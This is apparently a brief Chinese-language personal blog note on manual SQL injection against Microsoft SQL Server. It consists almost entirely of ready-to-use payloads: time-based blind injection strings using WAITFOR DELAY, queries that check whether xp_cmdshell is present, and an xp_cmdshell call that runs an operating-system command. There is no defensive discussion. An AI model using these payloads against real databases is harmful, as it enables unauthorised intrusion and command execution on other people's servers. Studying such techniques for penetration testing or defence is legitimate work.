MSSQL 手工注入 | CXAQHQ

MSSQL 手工注入

2023-05-07 1 min read

参考链接：

https://xz.aliyun.com/t/7534

时间盲注

admin' WAITFOR DELAY '0:0:5


admin' IF(29=29) WAITFOR DELAY '0:0:5'--

判断xp_cmdshell 状态

select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'


更简单方法
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

执行命令

exec master..xp_cmdshell 'whoami'

- 判断xp_cmdshell 状态
- 执行命令

下一篇

Impacket